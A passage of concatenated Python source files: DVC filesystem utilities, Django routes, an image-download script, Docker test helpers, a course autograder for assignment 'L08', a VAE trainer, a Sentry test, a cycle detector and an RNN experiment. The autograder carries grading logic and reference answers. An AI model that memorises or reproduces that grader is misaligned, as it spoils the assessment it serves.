BasePathNotInCheckedPathException(path, base_path)\n\n if path == base_path:\n return False\n if System.is_symlink(path):\n return True\n if os.path.dirname(path) == path:\n return False\n return contains_symlink_up_to(os.path.dirname(path), base_path)\n\n\ndef move(src, dst, mode=None):\n \"\"\"Atomically move src to dst and chmod it with mode.\n\n Moving is performed in two stages to make the whole operation atomic in\n case src and dst are on different filesystems and actual physical copying\n of data is happening.\n \"\"\"\n\n src = fspath_py35(src)\n dst = fspath_py35(dst)\n\n dst = os.path.abspath(dst)\n tmp = \"{}.{}\".format(dst, str(uuid()))\n\n if os.path.islink(src):\n shutil.copy(os.readlink(src), tmp)\n os.unlink(src)\n else:\n shutil.move(src, tmp)\n\n if mode is not None:\n os.chmod(tmp, mode)\n\n shutil.move(tmp, dst)\n\n\ndef _chmod(func, p, excinfo):\n perm = os.lstat(p).st_mode\n perm |= stat.S_IWRITE\n\n try:\n os.chmod(p, perm)\n except OSError as exc:\n # broken symlink or file is not owned by us\n if exc.errno not in [errno.ENOENT, errno.EPERM]:\n raise\n\n func(p)\n\n\ndef remove(path):\n path = fspath_py35(path)\n\n logger.debug(\"Removing '{}'\".format(relpath(path)))\n\n try:\n if os.path.isdir(path):\n shutil.rmtree(path, onerror=_chmod)\n else:\n _chmod(os.unlink, path, None)\n except OSError as exc:\n if exc.errno != errno.ENOENT:\n raise\n","sub_path":"dvc/utils/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"289018338","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url('^$', views.index, name='homepage'),\n\n url(r'^login/$', views.login, name='login'),\n url(r'^register/$', views.register, name='register'),\n url(r'^loginout/$', views.loginout, name='loginout'),\n\n url(r'^user-list/$', views.user_list, name='user_list'),\n url(r'^user-add/$', views.user_add, name='user_add'),\n url(r'^user-edit/(?P\\d+)/$', views.user_edit, name='user_edit'),\n url(r'^user-delete/(?P\\d+)/$', views.user_delete, name='user_delete'),\n\n url(r'^get-current-role-req/(?P\\d+)/$', views.get_current_role_req, name='get_current_role'),\n url(r'^set-current-role-req/$', views.set_current_role_req_post, name='set_current_role'),\n\n url(r'^role-list/$', views.role_list, name='role_list'),\n url(r'^role-add/$', views.role_add, name='role_add'),\n url(r'^role-edit/(?P\\d+)/$', views.role_edit, name='role_edit'),\n url(r'^role-delete/(?P\\d+)/$', views.role_delete, name='role_delete'),\n \n url(r'^menu-role-list/$', views.menu_role_list, name='menu_role_list'),\n url(r'^get-tree-by-role-req/(?P\\d+)/$', views.get_tree_by_role_req, name='role_tree_list'),\n\n url(r'^user_role_list_req/(?P\\w+)/$', views.user_role_list_req, name='user_role_list'),\n url(r'^user_role_save_req/$', views.user_role_save_req_post, name='user_role_save'),\n \n]\n","sub_path":"systemmngr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41455080","text":"from sklearn.cluster import AgglomerativeClustering as AC\n#from collections import Counter\n#from matplotlib import pyplot as plt\nimport math, os, hashlib\nimport numpy as np\nimport urllib.request as req\n\nf = open(\"file_new.txt\", 'r')\nStrF = f.read()\nf.close()\nListF = StrF.split()\nListKey = ListF[0::8]\nListKey = [x[10:] for x in ListKey]\nListKey = [\"https://chimera.biomed.kiev.ua/video/pendel-3d/tst.php?res=\" + x.split('/')[0] + \"#\" + x + '/' for x in ListKey]\ndel ListF[0::8]\nListF = [float(x) for x in ListF]\na = 0\nb = 7\nListVal = []\nwhile b <= len(ListF):\n ListVal.append(ListF[a:b])\n a = b\n b = b + 7\n\n# Del NaN and 1\nListKey = [y for x,y in zip(ListVal, ListKey) if not (math.isnan(x[0]) or (x[0] == 1 and x[1] == 1))]\nListVal = [x for x in ListVal if not (math.isnan(x[0]) or (x[0] == 1 and x[1] == 1))]\n\nDictF = {x: y for x, y in zip(ListKey, ListVal)}\n\nprint(len(ListKey))\nfor url in ListKey:\n temp = url.split('tst.php?res=')\n if not os.path.isfile('/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.png'):\n try:\n req.urlretrieve(temp[0] + temp[1][temp[1].index('#')+1:] + 'screenshot1.png', '/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.png')\n except:\n open('/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.txt','a').close()\n","sub_path":"result/aglomer/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602222638","text":"\"\"\"\nLogic for running containers used for testing dependencies\n\"\"\"\nimport asyncio\nimport logging\nimport socket\nfrom contextlib import asynccontextmanager\nfrom functools import partial as p\n\nimport docker\n\nfrom .util import asyncify\nfrom .wait import wait_for_async\n\nlogging.getLogger(\"elasticsearch\").setLevel(logging.ERROR)\n\n\ndef docker_client():\n return docker.client.from_env(timeout=90.0)\n\n\nasync def build_async(*args, **kwargs):\n \"\"\"\n Builds a docker container in an executor so it doesn't block the event loop.\n \"\"\"\n return await asyncio.get_event_loop().run_in_executor(\n None, p(docker_client().images.build, *args, **kwargs)\n )\n\n\ndef tcp_socket_open(host, port):\n \"\"\"\n Returns true if the given host/port is listening for TCP connections\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(2)\n return sock.connect_ex((host, port)) == 0\n\n\ndef container_ip(container):\n \"\"\"\n Returns the IP address of the given container.\n \"\"\"\n container.reload()\n return container.attrs[\"NetworkSettings\"][\"IPAddress\"]\n\n\n@asynccontextmanager\nasync def run_container(image, wait_for_port=None, **kwargs):\n \"\"\"\n Run a container using a context manager, yielding the container object and making sure it is\n shut down when the context is exited.\n \"\"\"\n client = docker_client()\n\n cont = await asyncify(client.containers.run, image, detach=True, **kwargs)()\n\n try:\n assert await wait_for_async(p(container_ip, cont)), \"Container did not get an IP address\"\n\n if wait_for_port:\n assert await wait_for_async(p(tcp_socket_open, container_ip(cont), wait_for_port)), (\n \"TCP port %d did not get opened\" % wait_for_port\n )\n\n yield cont\n finally:\n try:\n print(\"Removing container %s\" % image)\n print(\"Container %s logs:\\n%s\" % (image, cont.logs().decode(\"utf-8\")))\n finally:\n try:\n cont.remove(v=True, force=True)\n except docker.errors.APIError as e:\n print(f\"Error removing container {image}: {e}\")\n","sub_path":"pycommon/remtesting/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36536239","text":"# coding=utf-8\n'''\n# c = 50\n\n\ndef demo():\n c = 50\n for i in range(0, 9):\n c += 1\n print(c)\n\n\n# print(c)\ndemo()\n'''\n\n# 链式 作用域链 作用域具有逐级寻找的过程\nc = 1\n'''\ndef func1():\n c = 2\n\n def func2():\n c = 3\n print(c)\n\n func2()\n\n\nfunc1()\n'''\n\n# global关键字可让外部函数调用函数内变量\n\n\ndef demo():\n global c\n c = 2\n\n\ndemo()\nprint(c)\n","sub_path":"selflearning/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137660878","text":"#\n# Title: Unittest Template for COS120 Assignments\n# Author: John Luscombe / School Email: john_luscombe@taylor.edu / Personal Email: jluscombe96@gmail.com\n# Version: 2.0\n#\n\nimport unittest\nimport sys\nimport textwrap\nimport random\nfrom io import StringIO\nfrom unittest.mock import patch\nfrom copy import deepcopy\n\ntry:\n from gradetracker import GradeTracker\nexcept:\n print(\"=\"*70)\n print(\"FATAL ERROR\".center(70))\n print(\"=\"*70)\n print('Could not find \"gradetracker.py\".')\n print(textwrap.fill(\"Please make sure it is in the modules directory, or the same directory as this file.\", 70) +\n \"\\n\")\n input(\"\")\n sys.exit()\ntry:\n import L08\nexcept:\n print(\"=\"*70)\n print(\"FATAL ERROR\".center(70))\n print(\"=\"*70)\n print(textwrap.fill(\"An unknown error occurred when running the unit tests. Try the following to fix the\" +\n \"problem:\", 70)+\"\\n\")\n print(textwrap.fill(\"1. Run your Python source code. Resolve any errors that may appear.\", 70)+\"\\n\")\n print(textwrap.fill('2. Look at the top of your window. Does it say \"L08\" (not \"L08 Starter' +\n 'Code\")? If not, close out of your window, rename it to \"L08\", and run the tests' +\n 'again.', 70)+\"\\n\")\n print(textwrap.fill(\"3. Make sure your source code is running in the same directory as the unit test file. You\" +\n \"can verify this by looking in the title bar of your IDLE window.\", 70)+\"\\n\")\n print(textwrap.fill(\"If you continue having problems, please contact a TA.\", 70)+\"\\n\")\n input(\"\")\n sys.exit()\n\n\nclass AssignmentInfo:\n PROBLEM_NAMES = [\"printContents\", \"getKeyValuePairs\", \"printSortedByKey\", \"printSortedByValue\",\n \"addToList\", \"addKeyValue\", \"findValue\", \"valueInList\", \"sortList\", \"mergeLists\",\n \"mergeLists2\", \"plotPoints\", \"createNewValuesD\"]\n PROBLEM_VALUES = [1.0, 1.0, 1.0, 6.0, 1.0, 1.0, 5.0, 5.0, 15.0, 20.0, 5.0, 20.0, 19.0]\n MANUAL_PROBLEMS = [\"plotPoints\"]\n PROBLEMS_CHECK_REQUIRED = [\"valueInList\", \"sortList\", \"mergeLists\"]\n HINTS = [\n [\"addToList, addKeyValue, and valueInList\", [5, 6, 7], \"Are you assuming that the entered value is going to\" +\n \" be an integer? What if the user tries to enter a\" +\n \" string?\"],\n [\"Sorting List Problems\", [9, 10], \"Try to think through this problem by getting out a pencil and paper or\" +\n \" going to the whiteboard, and think about how you would sort an unsorted\" +\n \" list by hand. This might give you a clue as to how to do it on the\" +\n \" computer.\"]\n ]\n QUOTE = '\"It always seems impossible until it\\'s done.\" ~Nelson Mandela'\n\n\nclass Helper:\n w = [83, 99, 2, 3, 1, 7, 54, 1]\n x = [23, 12, 67, 5, 4, 11, 2, 84, 12, 16]\n y = {\"staplers\": 2, \"pencils\": 45, \"erasers\": 12, \"paper clips\": 200, \"pens\": 84, \"markers\": 12}\n z = {23012: 2, 77321: 5, 32332: 234, 77656: 16, 21321: 802, 99876: 3}\n\n @staticmethod\n def getRandomFiveCharacterString():\n string = \"\"\n for i in range(5):\n string += chr(random.randint(65, 122))\n return string\n\n @staticmethod\n def getRandomList():\n lst = []\n for i in range(3):\n lst.append(Helper.getRandomFiveCharacterString())\n return lst\n\n @staticmethod\n def getRandomNumList():\n lst = []\n for i in range(5):\n lst.append(random.randint(0, 100))\n return lst\n\n @staticmethod\n def getRandomDictionary():\n d = {}\n for i in range(3):\n key = Helper.getRandomFiveCharacterString()\n value = random.randint(0, 100)\n d[key] = value\n return d\n\n @staticmethod\n def getListOfRandomLists(listOfLists=None):\n if listOfLists is None:\n listOfLists = []\n for i in range(50):\n listOfLists.append(Helper.getRandomList())\n for i in range(50):\n listOfLists.append(Helper.getRandomNumList())\n return listOfLists\n\n @staticmethod\n def getListOfRandomDicts(listOfDicts=None):\n if listOfDicts is None:\n listOfDicts = []\n for i in range(100):\n listOfDicts.append(Helper.getRandomDictionary())\n return listOfDicts\n\n @staticmethod\n def buildStringFromList(lst):\n string = \"\"\n for item in lst:\n string += str(item) + \"\\n\"\n return string[:-1]\n\n @staticmethod\n def buildStringFromDict(d, sortBy=\"\"):\n if sortBy.lower() == \"key\":\n return Helper._buildStringFromDictSortedByKey(d)[:-1]\n elif sortBy.lower() == \"value\":\n return Helper._buildStringFromDictSortedByValue(d)[:-1]\n else:\n return Helper._buildStringFromDictNoSort(d)[:-1]\n\n @staticmethod\n def _buildStringFromDictSortedByKey(d):\n string = \"\"\n keys = sorted(list(d.keys()))\n for key in keys:\n value = d[key]\n string += \"%s %s\\n\" % (key, value)\n return string\n\n @staticmethod\n def _buildStringFromDictSortedByValue(d):\n string = \"\"\n keys = list(d.keys())\n values = sorted(list(d.values()))\n processedKeys = []\n for value in values:\n for key in keys:\n if d[key] == value and key not in processedKeys:\n string += \"%s %s\\n\" % (key, value)\n processedKeys.append(key)\n return string\n\n @staticmethod\n def _buildStringFromDictNoSort(d):\n string = \"\"\n for key in d:\n value = d[key]\n string += \"%s %s\\n\" % (key, value)\n return string\n\n @staticmethod\n def standardizeBoolean(obj):\n if obj is True:\n return True\n elif obj is False:\n return False\n elif isinstance(obj, str) and obj.lower() == \"true\":\n return True\n elif isinstance(obj, str) and obj.lower() == \"false\":\n return False\n else:\n raise ValueError(\"Expected True or False, got %s\" % obj)\n\n @staticmethod\n def standardizeDictOutput(string):\n finalString = \"\"\n lines = string.split(\"\\n\")\n for line in lines:\n if \" : \" in line:\n lineProperForm = line.split(\" : \")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \": \" in line:\n lineProperForm = line.split(\": \")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \" :\" in line:\n lineProperForm = line.split(\" :\")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \":\" in line:\n lineProperForm = line.split(\":\")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n else:\n finalString += line + \"\\n\"\n\n return finalString\n\n @staticmethod\n def createNewValuesDAnswer(aDict):\n newDict = {}\n values = list(aDict.values())\n for value in values:\n if values.count(value) > 1:\n return {}\n for key in aDict:\n newDict[aDict[key]] = key\n return newDict\n\n\nclass Unittests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n problemNames = AssignmentInfo.PROBLEM_NAMES\n problemValues = AssignmentInfo.PROBLEM_VALUES\n manualProblems = AssignmentInfo.MANUAL_PROBLEMS\n problemsCheckRequired = AssignmentInfo.PROBLEMS_CHECK_REQUIRED\n hints = AssignmentInfo.HINTS\n quote = AssignmentInfo.QUOTE\n cls.gradeTracker = GradeTracker(problemNames, problemValues, manualProblems,\n problemsCheckRequired, hints, quote)\n\n def setUp(self):\n self.saved_stdout = sys.stdout\n self.out = StringIO()\n sys.stdout = self.out\n\n def tearDown(self):\n sys.stdout = self.saved_stdout\n\n @classmethod\n def tearDownClass(cls):\n cls.gradeTracker.printReport()\n\n def getOutput(self):\n output = self.out.getvalue().strip()\n self.out = StringIO()\n sys.stdout = self.out\n return output\n\n def forcePrint(self, obj):\n sys.stdout = self.saved_stdout\n print(obj)\n self.out = StringIO()\n sys.stdout = self.out\n\n def test_printContents(self):\n listOfLists = [Helper.w, Helper.x]\n for lst in Helper.getListOfRandomLists(listOfLists):\n L08.printContents(lst[:])\n studentAnswer = self.getOutput()\n correctAnswer = Helper.buildStringFromList(lst)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s\" % lst)\n\n self.gradeTracker.setCorrect(1)\n\n def test_getKeyValuePairs(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n studentAnswer = L08.getKeyValuePairs(deepcopy(d))\n correctAnswer = sorted(list(d.items()))\n self.assertEqual(sorted(studentAnswer), correctAnswer, \"Failed with dictionary %s\" % d)\n self.assertTrue(isinstance(studentAnswer, list), \"Result not converted to list\")\n\n self.gradeTracker.setCorrect(2)\n\n def test_printSortedByKey(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n L08.printSortedByKey(deepcopy(d))\n studentAnswer = self.getOutput()\n studentAnswer = Helper.standardizeDictOutput(studentAnswer)\n correctAnswer = Helper.buildStringFromDict(d, sortBy=\"key\")\n correctAnswer = Helper.standardizeDictOutput(correctAnswer)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(3)\n\n def test_printSortedByValue(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n L08.printSortedByValue(deepcopy(d))\n studentAnswer = self.getOutput()\n studentAnswer = Helper.standardizeDictOutput(studentAnswer)\n correctAnswer = Helper.buildStringFromDict(d, sortBy=\"value\")\n correctAnswer = Helper.standardizeDictOutput(correctAnswer)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(4)\n\n @patch('builtins.input')\n def test_addToList(self, ipt):\n for lst in Helper.getListOfRandomLists():\n randomString = Helper.getRandomFiveCharacterString()\n ipt.return_value = randomString\n studentAnswer = L08.addToList(lst[:])\n correctAnswer = lst[:] + [randomString]\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s and input %s\" % (lst, randomString))\n\n self.gradeTracker.setCorrect(5)\n\n @patch('builtins.input')\n def test_addKeyValue(self, ipt):\n for d in Helper.getListOfRandomDicts():\n key = Helper.getRandomFiveCharacterString()\n value = Helper.getRandomFiveCharacterString()\n ipt.side_effect = [key, value]\n studentAnswer = L08.addKeyValue(deepcopy(d))\n correctAnswer = deepcopy(d)\n correctAnswer[key] = value\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s, key %s, and value %s\" %\n (d, key, value))\n\n self.gradeTracker.setCorrect(6)\n\n @patch('builtins.input')\n def test_findValue(self, ipt):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n ipt.side_effect = list(d.keys()) + [\"key not in dictionary\"]\n for key in d.keys():\n studentAnswer = L08.findValue(deepcopy(d))\n self.assertEqual(studentAnswer, d[key], \"Failed with dictionary %s and input %s\" % (d, key))\n studentAnswer = L08.findValue(d)\n self.assertIsNotNone(studentAnswer, 'Does not print \"No such value\" when a key is not in the given' +\n ' dictionary')\n\n self.gradeTracker.setCorrect(7)\n\n @patch('builtins.input')\n def test_valueInList(self, ipt):\n listOfLists = [Helper.w[:], Helper.x[:]]\n for lst in Helper.getListOfRandomLists(listOfLists):\n ipt.side_effect = lst[:] + [\"item not in list\"]\n for item in lst:\n studentAnswer = L08.valueInList(lst[:])\n studentAnswer = Helper.standardizeBoolean(studentAnswer)\n self.assertTrue(studentAnswer, 'Failed with list %s and input %s' % (lst, item))\n studentAnswer = L08.valueInList(lst[:])\n studentAnswer = Helper.standardizeBoolean(studentAnswer)\n self.assertFalse(studentAnswer, \"Does not return the proper value when a value is not in the list\")\n\n self.gradeTracker.setCorrect(8)\n\n def test_sortList(self):\n listOfLists = [Helper.w[:], Helper.x[:]]\n for lst in Helper.getListOfRandomLists(listOfLists):\n studentAnswer = L08.sortList(lst[:])\n correctAnswer = sorted(lst)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s\" % lst)\n\n self.gradeTracker.setCorrect(9)\n\n def test_mergeLists(self):\n listOfLists = [[1, 3, 5, 7], [2, 4, 6, 8], [1, 3], [2, 4, 6, 8, 10], Helper.w[:], Helper.x[:]]\n for i in range(50):\n listOfLists.append(Helper.getRandomNumList())\n for idx in range(0, len(listOfLists), 2):\n list1 = sorted(listOfLists[idx])\n list2 = sorted(listOfLists[idx+1])\n for i in range(random.randint(0, len(list1))):\n list1.pop()\n for i in range(random.randint(0, len(list2))):\n list2.pop()\n studentAnswer = L08.mergeLists(list1[:], list2[:])\n correctAnswer = sorted(list1 + list2)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with lists %s and %s\" % (list1, list2))\n\n self.gradeTracker.setCorrect(10)\n\n def test_mergeLists2(self):\n listOfLists = [[1, 3, 5, 7], [2, 4, 6, 8], [1, 3], [2, 4, 6, 8, 10], Helper.w[:], Helper.x[:]]\n for i in range(50):\n listOfLists.append(Helper.getRandomNumList())\n for idx in range(0, len(listOfLists), 2):\n list1 = sorted(listOfLists[idx])\n list2 = sorted(listOfLists[idx+1])\n for i in range(random.randint(0, len(list1))):\n list1.pop()\n for i in range(random.randint(0, len(list2))):\n list2.pop()\n studentAnswer = L08.mergeLists2(list1[:], list2[:])\n correctAnswer = sorted(list1 + list2)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with lists %s and %s\" % (list1, list2))\n\n self.gradeTracker.setCorrect(11)\n\n def test_createNewValuesD(self):\n listOfDicts = [{\"a\": 5, \"b\": 12, \"k\": 13}, Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n studentAnswer = L08.createNewValuesD(deepcopy(d))\n correctAnswer = Helper.createNewValuesDAnswer(d)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(13)\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=0)\n","sub_path":"L08/L08Test.py","file_name":"L08Test.py","file_ext":"py","file_size_in_byte":15605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54653579","text":"#%%\nfrom __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom visdom import Visdom\n\nfrom modules import VAE\nfrom train_test import train\nfrom train_test import test\nimport utils\n\n\n#%%\nlog_interval = 100\nseed = 1\n\ntorch.manual_seed(seed)\n\nfrom chosen_gpu import get_freer_gpu\ndevice = torch.device(get_freer_gpu())\nprint(\"Configured device: \", device)\n\n#%%\n\ncompose = transforms.Compose(\n [\n transforms.Resize((64,64)),\n transforms.ToTensor(),\n #transforms.Normalize((.5, .5, .5), (.5, .5, .5))\n ])\n\nds = torchvision.datasets.ImageFolder(root='dataset/', transform=compose)\n\nratio = [int(len(ds)*0.7), len(ds) - int(len(ds)*0.7)]\n\ntrain_dataset, test_dataset = torch.utils.data.random_split(ds, ratio)\n\nbatch_size=4\n\ntrain_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,\n shuffle=True, num_workers=1, pin_memory=True)\ntest_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,\n shuffle=False,num_workers=1, pin_memory=True)\nprint('train_loader', len(train_loader))\nprint('test_loader', len(test_loader))\n\n#%%\nmodel = VAE().to(device)\n# optimizer = optim.Adam(model.parameters(), lr=1e-3)\noptimizer = optim.Adam(model.parameters(), lr=1e-3, betas = (0.9,0.999), weight_decay = 0.0005)\n\n#%%\nepochs = 100\nviz = Visdom() \nglobal plotter, recon\nplotter = utils.VisdomLinePlotter(env_name='main')\nsample_image = utils.VisdomImage(env_name='main')\nrecon = utils.VisdomImage(env_name='main')\n\nfor epoch in range(1, epochs + 1):\n with torch.no_grad():\n sample = torch.randn(32,32).to(device)\n sample = model.decode(sample).cpu()\n print(\"save image: \" + 'results/sample_' + str(epoch) + '.png')\n save_image(sample, 'results/sample_' + str(epoch) + '.png')\n sample_image.display_image(sample, 0, 'SAMPLE RECON')\n train(batch_size, epoch, model, train_loader, device, optimizer, plotter)\n test(batch_size, epoch, model, test_loader, device, optimizer, plotter, recon)","sub_path":"09-VAEs/AIT_ICT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112542085","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nimport os\nimport json\nimport responses\n\nfrom sentry.testutils import TestCase\nfrom sentry.models import Event\n\n\ndef get_fixture_path(name):\n return os.path.join(os.path.dirname(__file__), 'example-project', name)\n\n\ndef load_fixture(name):\n with open(get_fixture_path(name)) as f:\n return f.read()\n\n\nclass ExampleTestCase(TestCase):\n @responses.activate\n def test_sourcemap_expansion(self):\n responses.add(\n responses.GET,\n 'http://example.com/test.js',\n body=load_fixture('test.js'),\n content_type='application/javascript'\n )\n responses.add(\n responses.GET,\n 'http://example.com/test.min.js',\n body=load_fixture('test.min.js'),\n content_type='application/javascript'\n )\n responses.add(\n responses.GET,\n 'http://example.com/test.map',\n body=load_fixture('test.map'),\n content_type='application/json'\n )\n responses.add(responses.GET, 'http://example.com/index.html', body='Not Found', status=404)\n\n data = {\n 'message': 'hello',\n 'platform': 'javascript',\n 'sentry.interfaces.Exception': {\n 'values': [\n {\n 'type': 'Error',\n 'stacktrace': {\n 'frames': json.loads(load_fixture('minifiedError.json'))[::-1],\n },\n }\n ],\n }\n }\n\n resp = self._postWithHeader(data)\n assert resp.status_code == 200\n\n event = Event.objects.get()\n\n exception = event.interfaces['sentry.interfaces.Exception']\n frame_list = exception.values[0].stacktrace.frames\n\n assert len(frame_list) == 4\n\n assert frame_list[0].function == 'produceStack'\n assert frame_list[0].lineno == 6\n assert frame_list[0].filename == 'index.html'\n\n # This function name is obviously wrong but the current logic we\n # have does not permit better data here\n assert frame_list[1].function == 'i'\n assert frame_list[1].lineno == 20\n assert frame_list[1].filename == 'test.js'\n\n assert frame_list[2].function == 'invoke'\n assert frame_list[2].lineno == 15\n assert frame_list[2].filename == 'test.js'\n\n # This function name is obviously wrong but the current logic we\n # have does not permit better data here\n assert frame_list[3].function == 'cb'\n assert frame_list[3].lineno == 5\n assert frame_list[3].filename == 'test.js'\n","sub_path":"tests/sentry/lang/javascript/test_example.py","file_name":"test_example.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53026477","text":"from collections import defaultdict\n\n\nclass Graph:\n def __init__(self, num_of_vertices):\n self.V = num_of_vertices\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n def isCycleInDFS(self, u, visited, recursive_stack):\n\n visited[u] = True\n recursive_stack[u] = True\n\n for v in self.graph[u]:\n if recursive_stack[v] is True:\n return True\n if not visited[v]:\n if self.isCycleInDFS(v, visited, recursive_stack):\n return True\n\n recursive_stack[u] = False\n return False\n\n def isCyclePresent(self):\n\n if not self.graph:\n return False\n\n visited = [False] * self.V\n recursive_stack = [False] * self.V\n\n # Call the recursive helper function to detect cycle in different\n # DFS trees\n for i in range(self.V):\n if visited[i] is False:\n if self.isCycleInDFS(i, visited, recursive_stack) is True:\n return True\n return False\n\n\ng = Graph(6)\ng.addEdge(5, 2)\ng.addEdge(5, 0)\ng.addEdge(2, 0)\ng.addEdge(0, 3)\ng.addEdge(4, 1)\ng.addEdge(3, 2)\ng.addEdge(3, 1)\nprint(g.isCyclePresent())\n","sub_path":"is_cycle_present_in_directed_graph_without_colors.py","file_name":"is_cycle_present_in_directed_graph_without_colors.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607987428","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 17 13:01:52 2019\r\n@author: shankar\r\n\"\"\"\r\nimport numpy as np\r\nfrom anytree import Node\r\nimport matplotlib.pyplot as plt\r\nfrom Definitions import *\r\n\r\nBLANK_INPUT = 0\r\nSIGNAL_INPUT = 0.1\r\nstart_h_value = np.random.random_sample()\r\n\r\nResNet_weights = [-2, 0.1]\r\nGRU_weights = np.reshape(2*np.random.random_sample((6, 1)) - 1,(1,6))[0] #Wz,Uz,Wr,Ur,Wh,Uh\r\n\r\n\r\nsolver_initial_ResNet = [-100,0,100]\r\nsolver_initial_GRU = [-1, -0.8, -0.6, -0.4, -0.2, 0, 0.2, 0.4, 0.6, 0.8, 1]\r\n\r\n\r\n\"\"\" Select what RNN to use \"\"\"\r\nRNN_weights = list(GRU_weights)\r\nsolver_initial = solver_initial_GRU\r\nbackward_equation = bwd_GRU\r\nfwd_equation = fwd_GRU\r\n\r\n\r\nN = 5\r\nstart = Node(\"h=\"+str(start_h_value),parent=None,children=None,value=start_h_value,time_step=1)\r\n\r\ndef expand_tree(root):\r\n h_kk = root.value\r\n x_k = BLANK_INPUT\r\n #params = [h_kk,x_k,W,U]\r\n params = [h_kk,x_k] + RNN_weights\r\n if(root.time_step == N):\r\n return\r\n else:\r\n sols = get_solutions(backward_equation,solver_initial,params);\r\n for x in sols:\r\n expand_tree(Node(\"h=\"+str(x),parent=root,children=None,value=x,time_step=root.time_step + 1))\r\n return\r\n\r\nexpand_tree(start)\r\n\r\npaths = []\r\na = list(start.leaves)\r\nfor node in a:\r\n path = []\r\n for i in node.iter_path_reverse():\r\n path.append(i.value)\r\n paths.append(path[::-1])\r\n \r\nfor i in range(len(paths)):\r\n plt.plot(paths[i],linewidth=0.5)\r\n\r\nh_0 = 0.0\r\nh_end = []\r\ntrajectories_with_inputs = []\r\nfor path in paths:\r\n output = [h_0]\r\n for p in path:\r\n output.append(fwd_equation(output[-1],p,RNN_weights))\r\n trajectories_with_inputs.append(output)\r\n h_end.append(output[-1])\r\n\r\n\r\n\r\nT = 100\r\ntrajectories_blank_input = [list(h_end)]\r\nfor k in range(T):\r\n trajectories_blank_input.append(list(fwd_equation(trajectories_blank_input[-1],BLANK_INPUT,RNN_weights)))\r\nh_end_forward= np.array(trajectories_blank_input[-1])\r\nh_start_backward = np.array([path[1] for path in paths])\r\n\r\nerror = h_start_backward - fwd_equation(h_end_forward,SIGNAL_INPUT,RNN_weights)\r\n\r\nplot_traj(paths)\r\nplt.plot(np.sort(error))\r\nplt.show()\r\nERROR_MARGIN = 1\r\ngood_error_indices = (np.argwhere((error > -ERROR_MARGIN) & (error < ERROR_MARGIN)).T).tolist()[0]\r\nfeasible_paths = [paths[i] for i in good_error_indices]\r\nplot_traj(feasible_paths)\r\nplot_traj(trajectories_with_inputs)\r\n\"\"\"\r\nplot_traj(paths)\r\n\r\nplot_traj([trajectories_with_inputs[i] for i in range(1,19683,1)])\r\n\r\nplot_traj(trajectories_blank_input[1:80], False)\r\n\"\"\"\r\nprint(list([1,2]).append(RNN_weights))\r\na = [1,2] + 